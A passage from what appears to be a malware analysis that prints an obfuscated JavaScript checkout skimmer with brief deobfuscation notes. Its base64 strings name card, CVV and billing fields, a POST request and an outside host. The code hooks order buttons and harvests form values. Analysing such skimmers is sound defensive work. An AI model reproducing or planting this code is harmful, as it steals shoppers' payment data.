  <span class="token string">"X2NjX251bWJlcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"c3Vic3Ry"</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fY2NfbnVtYmVy"</span><span class="token punctuation">,</span>
  <span class="token string">"Z2V0RWxlbWVudEJ5SWQ="</span><span class="token punctuation">,</span>
  <span class="token string">"dmFsdWU="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fZXhwaXJhdGlvbg=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2V4cGlyYXRpb24="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fZXhwaXJhdGlvbl95cg=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2V4cGlyYXRpb25feXI="</span><span class="token punctuation">,</span>
  <span class="token string">"dm1fY2NfY2lk"</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2NpZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2V4cF9tb250aA=="</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2V4cF95ZWFy"</span><span class="token punctuation">,</span>
  <span class="token string">"X2NjX2N2dg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Zmlyc3RuYW1l"</span><span class="token punctuation">,</span>
  <span class="token string">"bGFzdG5hbWU="</span><span class="token punctuation">,</span>
  <span class="token string">"ZW1haWw="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyZWV0MQ=="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyZWV0Mg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Y2l0eQ=="</span><span class="token punctuation">,</span>
  <span class="token string">"cmVnaW9uX2lk"</span><span class="token punctuation">,</span>
  <span class="token string">"Y291bnRyeV9pZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"cG9zdGNvZGU="</span><span class="token punctuation">,</span>
  <span class="token string">"dGVsZXBob25l"</span><span class="token punctuation">,</span>
  <span class="token string">"YmlsbGluZzo="</span><span class="token punctuation">,</span>
  <span class="token string">"c3RyaW5naWZ5"</span><span class="token punctuation">,</span>
  <span class="token string">"dHBzOi8vbGlnaHRnZXRqcy5jb20="</span><span class="token punctuation">,</span>
  <span class="token string">"b3Blbg=="</span><span class="token punctuation">,</span>
  <span class="token string">"UE9TVA=="</span><span class="token punctuation">,</span>
  <span class="token string">"c2V0UmVxdWVzdEhlYWRlcg=="</span><span class="token punctuation">,</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token punctuation">(</span><span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x110cd2<span class="token punctuation">,</span> _0xa263bd</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">var</span> <span class="token function-variable function">_0x352891</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x76a704</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token operator">--</span>_0x76a704<span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x110cd2<span class="token punctuation">[</span><span class="token string">"push"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x110cd2<span class="token punctuation">[</span><span class="token string">"shift"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span><span class="token punctuation">;</span>
  <span class="token function">_0x352891</span><span class="token punctuation">(</span><span class="token operator">++</span>_0xa263bd<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span>_0x34d5<span class="token punctuation">,</span> <span class="token number">0xa5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

  • Decryption

    • 0x47fb: a decryption function. in this case the decryption algorithm is a simple _atob function (base64 decoding).
    • 0x522b23: _data key
    • 0xdb42df: _data token
<span class="token keyword">var</span> <span class="token function-variable function">_0x47fb</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x522b23<span class="token punctuation">,</span> _0x4fa39c</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  _0x522b23 <span class="token operator">=</span> _0x522b23 <span class="token operator">-</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
  <span class="token keyword">var</span> _0xdb42df <span class="token operator">=</span> _0x34d5<span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x47fb<span class="token punctuation">[</span><span class="token string">"IyfmVK"</span><span class="token punctuation">]</span> <span class="token operator">===</span> <span class="token keyword">undefined</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token punctuation">(</span><span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token keyword">var</span> <span class="token function-variable function">_0x28a5cc</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">var</span> _0x3f5c15<span class="token punctuation">;</span>
        <span class="token keyword">try</span> <span class="token punctuation">{</span>
          _0x3f5c15 <span class="token operator">=</span> <span class="token function">Function</span><span class="token punctuation">(</span><span class="token string">"returnx20(function()x20"</span> <span class="token operator">+</span> <span class="token string">"{}.constructor(x22returnx20thisx22)(x20)"</span> <span class="token operator">+</span> <span class="token string">");"</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x7f7a59<span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x3f5c15 <span class="token operator">=</span> window<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">return</span> _0x3f5c15<span class="token punctuation">;</span>
      <span class="token punctuation">}</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x1a2269 <span class="token operator">=</span> <span class="token function">_0x28a5cc</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x2009de <span class="token operator">=</span> <span class="token string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="</span><span class="token punctuation">;</span>
      _0x1a2269<span class="token punctuation">[</span><span class="token string">"atob"</span><span class="token punctuation">]</span> <span class="token operator">||</span>
        <span class="token punctuation">(</span>_0x1a2269<span class="token punctuation">[</span><span class="token string">"atob"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x2633f6</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          <span class="token keyword">var</span> _0x1bf8c8 <span class="token operator">=</span> <span class="token function">String</span><span class="token punctuation">(</span>_0x2633f6<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"replace"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">=+$</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
          <span class="token keyword">for</span> <span class="token punctuation">(</span>
            <span class="token keyword">var</span> _0x4e57f1 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x5122c7<span class="token punctuation">,</span> _0x5cb7d8<span class="token punctuation">,</span> _0x2540b4 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x140365 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
            <span class="token punctuation">(</span>_0x5cb7d8 <span class="token operator">=</span> _0x1bf8c8<span class="token punctuation">[</span><span class="token string">"charAt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x2540b4<span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token operator">~</span>_0x5cb7d8 <span class="token operator">&&</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>_0x5122c7 <span class="token operator">=</span> _0x4e57f1 <span class="token operator">%</span> <span class="token number">0x4</span> <span class="token operator">?</span> _0x5122c7 <span class="token operator">*</span> <span class="token number">0x40</span> <span class="token operator">+</span> _0x5cb7d8 <span class="token operator">:</span> _0x5cb7d8<span class="token punctuation">)</span><span class="token punctuation">,</span> _0x4e57f1<span class="token operator">++</span> <span class="token operator">%</span> <span class="token number">0x4</span><span class="token punctuation">)</span>
              <span class="token operator">?</span> <span class="token punctuation">(</span>_0x140365 <span class="token operator">+=</span> String<span class="token punctuation">[</span><span class="token string">"fromCharCode"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0xff</span> <span class="token operator">&</span> <span class="token punctuation">(</span>_0x5122c7 <span class="token operator">>></span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">0x2</span> <span class="token operator">*</span> _0x4e57f1<span class="token punctuation">)</span> <span class="token operator">&</span> <span class="token number">0x6</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
              <span class="token operator">:</span> <span class="token number">0x0</span>
          <span class="token punctuation">)</span> <span class="token punctuation">{</span>
            _0x5cb7d8 <span class="token operator">=</span> _0x2009de<span class="token punctuation">[</span><span class="token string">"indexOf"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x5cb7d8<span class="token punctuation">)</span><span class="token punctuation">;</span>
          <span class="token punctuation">}</span>
          <span class="token keyword">return</span> _0x140365<span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"cJuRna"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">_0x55fba5</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token keyword">var</span> _0xfd7af3 <span class="token operator">=</span> <span class="token function">atob</span><span class="token punctuation">(</span>_0x55fba5<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x953b7b <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x192361 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">,</span> _0x1f2b27 <span class="token operator">=</span> _0xfd7af3<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x192361 <span class="token operator"><</span> _0x1f2b27<span class="token punctuation">;</span> _0x192361<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x953b7b <span class="token operator">+=</span> <span class="token string">"%"</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">"00"</span> <span class="token operator">+</span> _0xfd7af3<span class="token punctuation">[</span><span class="token string">"charCodeAt"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x192361<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"toString"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"slice"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token operator">-</span><span class="token number">0x2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
      <span class="token keyword">return</span> <span class="token function">decodeURIComponent</span><span class="token punctuation">(</span>_0x953b7b<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"IyfmVK"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token operator">!</span><span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">var</span> _0x11ff5c <span class="token operator">=</span> _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span><span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x11ff5c <span class="token operator">===</span> <span class="token keyword">undefined</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    _0xdb42df <span class="token operator">=</span> _0x47fb<span class="token punctuation">[</span><span class="token string">"cJuRna"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0xdb42df<span class="token punctuation">)</span><span class="token punctuation">;</span>
    _0x47fb<span class="token punctuation">[</span><span class="token string">"naGzua"</span><span class="token punctuation">]</span><span class="token punctuation">[</span>_0x522b23<span class="token punctuation">]</span> <span class="token operator">=</span> _0xdb42df<span class="token punctuation">;</span>
  <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
    _0xdb42df <span class="token operator">=</span> _0x11ff5c<span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">return</span> _0xdb42df<span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

  • Logic

    • Execute the main malware part
    • using 0x47fb_ function to get data values from data key (‘0x0’, ‘0x1’, ‘0x2’…’)
    • Examples:
      • _0x47fb(‘0x0’); -> “place_order”
      • _0x47fb(‘0x7’); -> ”querySelectorAll”
<span class="token keyword">function</span> <span class="token function">readyr</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x0"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x3"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x4"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x6"</span><span class="token punctuation">)</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x9"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x375bef<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x36add6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xa"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xb"</span><span class="token punctuation">)</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x9"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x24b4f5<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x196a93<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

window<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x8"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xc"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> readyr<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setInterval</span><span class="token punctuation">(</span>bts<span class="token punctuation">,</span> <span class="token number">0x7d0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> vvk <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">bts</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x34f9e9 <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xd"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> window<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xe"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xd"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x4a60b2 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x7"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0xf"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x570cfd <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x57a5b3 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      el <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"id"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      pos <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x10"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>pos <span class="token operator">></span> <span class="token number">0x0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x57a5b3 <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x12"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x0</span><span class="token punctuation">,</span> pos<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x57a5b3<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x553440 <span class="token operator">=</span> _0x57a5b3<span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x1f7150<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x17"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x136215<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x19"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4ab22b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1b"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4df1f0<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
